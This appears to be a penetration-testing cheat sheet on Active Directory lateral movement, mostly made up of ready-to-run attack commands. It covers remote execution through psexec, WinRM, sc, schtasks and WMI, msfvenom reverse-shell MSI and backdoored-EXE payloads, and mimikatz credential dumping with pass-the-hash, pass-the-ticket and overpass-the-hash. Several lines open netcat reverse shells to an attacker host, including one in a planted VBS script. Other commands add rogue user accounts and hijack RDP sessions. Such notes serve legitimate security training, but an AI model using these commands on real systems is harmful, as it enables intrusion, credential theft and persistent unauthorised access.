killchain-compendium/Miscellaneous/Active Directory/lateral_movement.md

7.4 KiB

Lateral Movement

  • Finding credentials with more permissions move through the network cloaked, avoiding detection

  • Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found

  • Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts

  • Service executables need their own special reverse shell, msfvenom file format exe-service

Remote Processes

psexec

  • Port 445

  • SMB protocol

  • Group membership: Administrators

  • Upload the service binary to ADMIN$ directory of the SMB server

  • Use psexesvc.exe via service control manager to execute the remote process

  • Communication will be established through a named pipe

psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe

WinRM

  • Ports 5985 (HTTP) and 5986 (HTTPS)

  • Group Membership: Remote Management Users

  • Execute powershell commands on remote targets

winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
  • Run through powershell alternatively via
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}

sc

  • Ports 135, 49152-65535 (DCE/RPC), 135 shows service endpoints on the high ports

  • Ports 139 and 445RPC over SMB named pipes, if SVCCTL fails over 135

  • Group Membership: Administrators

  • Create service remotely via Service Control Manager (RPC) or SVCCTL

sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService

sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService

schtasks

  • Create remote scheduled tasks
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService" 
  • Delete scheduled tasks via
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F

wmi

  • Ports are

    • DCOM 135 RPC and dynamic ports
    • Wsman 5985 winrm HTTP and 5986 winrm HTTPS
  • Group membership: Administrators

  • To start, use the same object used for winrm

$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
  • Store the session
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
  • Spawn a remote process
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
  • Alternatively via
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%" 
  • Spawn a remote service
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "SteamUpdateService";
DisplayName = "SteamUpdateService";
PathName = "net user gabenewell securepassword /add"; 
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
  • Initiate the service
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"

Invoke-CimMethod -InputObject $Service -MethodName StartService
  • Start and stop via
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
  • Spawn a remote scheduled task
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
  • Delete task via
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
  • __ Install a remote msi package__
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
  • Upload and run via
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
  • Alternatively on older systems via
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi

Further Authentication Methods

  • NTLM
  • Kerberos

NTLM

Pass the hash

  • Retrieve and pass a hash generated from the password

  • Use mimikatz on local SAM

privilege::debug
token::elevate
lsadump::sam
* Use mimikatz on lsass
privilege::debug
token::elevate
sekurlsa::msv
* Open reverse shell via mimikatz
token::revert
sekurlsa::pth /user:<username>
/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP%  4711"
  • Via RDP
xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
  • Via psexec
psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
  • Kerberos
evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>

Kerberos

  • Ticket and session key are needed

Pass The Ticket

  • Extract via mimikatz
privilege::debug
sekurlsa::tickets /export
  • TGS need low privilege account, TGT need administrative privileges
  • Use the ticket to inject into a current session
kerberos::ptt <ticket>@<domain>.kirbi
  • Check tickets via klist

Overpass The Hash

  • Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
    • Algorithms can be rc4, aes128, aes256 or des if enabled
    • rc4 is a pure ntml hash
  • Use the key to gain the TGT
privilege::debug
sekurlsa::ekeys
  • Open a reverse shell via
sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"

Writeable Shares

  • Find a shortcut, a script or anything that keeps a connection over the network to a share

  • Reuse a *.vbs via

CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
  • Reuse and inject into exisiting portable executable
msfvenom -a x64 --platform windows  -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
  • Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run cmd or powershell as administrator and reuse the session by its name
PsExec64.exe -s cmd.exe
query user
  • Check output and fill in
tscon <ID-of-target> /dest:<my-SESSIONNAME>
  • Session state should be DISC, a session which was not exited correctly
  • Windows Server < 2019 only without the password